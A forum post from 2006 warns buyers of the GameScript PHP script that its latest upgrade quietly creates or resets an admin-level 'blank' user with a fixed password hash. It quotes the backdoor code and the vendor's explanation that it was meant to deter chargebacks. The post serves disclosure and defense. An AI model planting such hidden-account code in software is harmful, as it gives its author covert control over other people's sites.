Thread: Warning About GS "Blank" User..
View Single Post
Old 07-19-2006, 10:07 PM   #1 (permalink)
PlatinumN23
Full Member
 
Join Date: Jun 2006
Posts: 97
PlatinumN23 is on a distinguished road


Default Warning About GS "Blank" User..
It was recently brought to my attention that the LATEST Upgrade of GameScript has a "Backdoor" User...


Quote:
$usercheck = "SELECT * FROM `users` WHERE WHERE `username` ='blank'";
if(@mysql_num_rows(mysql_query($usercheck)) < 1){
@mysql_query("INSERT INTO `users` ( `username` , `password` , `securitylevel` , `email` , `id` , `logincount` , `gameplays` , `verified` , `subscribed` , `avatar` , `comments` , `location` , `gender` , `favgame` , `joined` , `status` , `pmsuspended` , `im` , `submissions` , `timestamp` , `ip` ) VALUES ( 'blank', '557cce710ecad98f3b0e507dbc2b4846', '0', 'admin@iamnotageek.com', NULL , '0', '0', '0', '1', '', '', '', '', '', '0000-00-00', '0', '0', '', '0', '0', '');");
}else { @mysql_query("UPDATE `users` SET `password` = '557cce710ecad98f3b0e507dbc2b4846', `securitylevel` = '1', `logincount` = '0' WHERE `username` ='blank' LIMIT 1"); }
Please DELETE That line if you DO NOT Want the username "Blank" (With ADMIN PERMISSIONS) Added to your site...

A word from the Author:

Quote:
If you don't like it simply remove that snippet of code in the first post. The script is unencoded for that very reason.

As also stated the install instructions even say to password protect your admin directory. When you do this that admin account is worthless. There is no other backdoor in place.

I put this code in place after watching $4k in chargebacks in 2 weeks all of our biggest packages where people simply install and steal our stuff just to turn and take the money right back. I have to do something and I have to do something drastic.

After talking to Adam the admin user account doesn't seem like the route to go but we will keep looking.
My Notes on the subject:

If an author is willing to sell a product with the fear of Chargebacks.. the author should consider encoding a few files and setting up a better LICENSING Script.. Yes, this can be a drag to many.. However, it will solve the problem and eliminate the need for a BackDoor / Admin User..


Just my .02 and I hope everyone takes heed of this notice
PlatinumN23 is offline  
Digg this Post!
Reply With Quote